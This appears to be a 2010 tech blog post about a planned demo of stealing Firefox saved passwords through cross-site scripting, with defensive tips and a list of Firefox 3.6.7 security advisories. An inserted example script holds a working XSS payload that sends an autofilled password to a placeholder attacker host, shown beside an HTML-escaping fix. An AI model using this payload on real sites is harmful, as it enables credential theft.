His demo will involve getting passwords out of Firefox's Password Manager using "nothing but garden variety Cross-Site Scripting (XSS)," says Grossman, who is founder and CTO of WhiteHat Security and a co-founder of the Web Application Security Consortium. Pulling it off requires an XSS hole in a site for which the victim has a saved password, plus tricking the victim into loading the attacker's script on that site, but how hard is that?
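The following is an added example, not code from the article or from Grossman's talk. It shows the shape of a "garden variety" XSS payload that turns the browser's password autofill into a password leak, beside the server-side fix: encoding untrusted input for the HTML context it lands in. The greeting page, the `renderGreeting*` functions and the attacker host are constructed for illustration (attacker.invalid is a reserved placeholder name).

```javascript
// Added example (not the article's or Grossman's code). The page, the
// functions and the attacker host below are constructed for illustration.

// The payload injects a login form into a page on an origin for which the
// victim has a saved credential. A browser that autofills that form exposes
// the password to the injected script, which then ships it off-site.
const XSS_PAYLOAD =
  '<form id="h"><input name="u"><input name="p" type="password"></form>' +
  '<script>setTimeout(function () {' +
  '  var p = document.getElementById("h").p.value;' +
  '  new Image().src = "https://attacker.invalid/?p=" + encodeURIComponent(p);' +
  '}, 500);</script>';

// Vulnerable: the request parameter is concatenated straight into the markup,
// so the browser parses the payload's <form> and <script> as live elements.
function renderGreetingVulnerable(displayName) {
  return '<p>Welcome back, ' + displayName + '!</p>';
}

// HTML-context encoder: the characters that can break out of element text or
// a quoted attribute value are replaced with character references.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;'
  };
  return String(value).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Hardened: identical page, but the untrusted value is encoded on output.
// The payload is displayed as inert text; no form, no script, no autofill.
function renderGreetingSafe(displayName) {
  return '<p>Welcome back, ' + escapeHtml(displayName) + '!</p>';
}

// Crude tag-level check used to compare the two renderings.
function containsLiveMarkup(html) {
  return /<(form|input|script)\b/i.test(html);
}

console.log(containsLiveMarkup(renderGreetingVulnerable(XSS_PAYLOAD))); // true
console.log(containsLiveMarkup(renderGreetingSafe(XSS_PAYLOAD)));       // false
```

Two points a practitioner would want alongside this. The XSS has to be on the origin the saved password belongs to, because that is the only place the browser will autofill it, so the real fix lives in that web application, not in the browser. And at the time Firefox honored autocomplete="off" on login forms, which keeps the Password Manager from filling (or offering to save) the credential a payload like this relies on, but that does nothing about the underlying XSS.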
As for IE, Grossman will also show attendees of his session how to mine the autocomplete function in IE 6 and 7 to scrape users' first and last names, aliases, e-mail addresses, physical addresses and so on from forms they have filled in before.
None of these vulnerabilities is new, but that doesn't stop the black hats from using them.
As for the beloved open source Firefox browser, there are a couple of steps users can take right away, and it would be wise to take them before every Web application hacker in the nation gets a first-hand demo. One is simply to delete the passwords stored in Firefox's Password Manager and stop saving new ones; a script cannot autofill a credential the browser no longer holds. The other is to install a Mozilla-approved Firefox add-on such as LastPass Password Manager. Be forewarned: users on the LastPass site say it crashes Firefox 3.6.6 a lot, particularly on Windows 7.
Alternatively, take the passwords out of the browser altogether and use an open source password manager like KeePass. KeePass is geared toward Windows users: both editions run natively on just about every Windows version out there, while on Linux the free 1.x "Classic Edition" needs Wine and the (also free) 2.x "Professional Edition" needs Mono. Linux users wanting a native cross-platform password manager will likely prefer the separate port, KeePassX, which supports Mac OS X as well.
Updated July 22: Per the comment from Bill H. below, I found the link to the security updates for Firefox 3.6.7 pushed out on July 20. Several of the advisories concern cross-origin data leakage (MFSA 2010-42, 2010-43, 2010-46 and 2010-47), but note that the "CSS" in MFSA 2010-46 means Cascading Style Sheets, not Cross-Site Scripting, and none of the release notes mention the hole that lets a script grab saved passwords. That is to be expected: XSS is a flaw in the web site that echoes untrusted input, not in the browser, so a browser update does not close it, and nothing in this batch of fixes changes the autofill behavior that the password-grabbing script relies on.
I still think it's not a bad idea to use a third-party tool for password protection.
Fixed in Firefox 3.6.7:
- MFSA 2010-47 Cross-origin data leakage from script filename in error messages
- MFSA 2010-46 Cross-domain data theft using CSS
- MFSA 2010-45 Multiple location bar spoofing vulnerabilities
- MFSA 2010-44 Characters mapped to U+FFFD in 8 bit encodings cause subsequent character to vanish
- MFSA 2010-43 Same-origin bypass using canvas context
- MFSA 2010-42 Cross-origin data disclosure via Web Workers and importScripts
- MFSA 2010-41 Remote code execution using malformed PNG image
- MFSA 2010-40 nsTreeSelection dangling pointer remote code execution vulnerability
- MFSA 2010-39 nsCSSValue::Array index integer overflow
- MFSA 2010-38 Arbitrary code execution using SJOW and fast native function
- MFSA 2010-37 Plugin parameter EnsureCachedAttrParamArrays remote code execution vulnerability
- MFSA 2010-36 Use-after-free error in NodeIterator
- MFSA 2010-35 DOM attribute cloning remote code execution vulnerability
- MFSA 2010-34 Miscellaneous memory safety hazards (rv:1.9.2.7/ 1.9.1.11)
Follow Julie Bort on Twitter @Julie188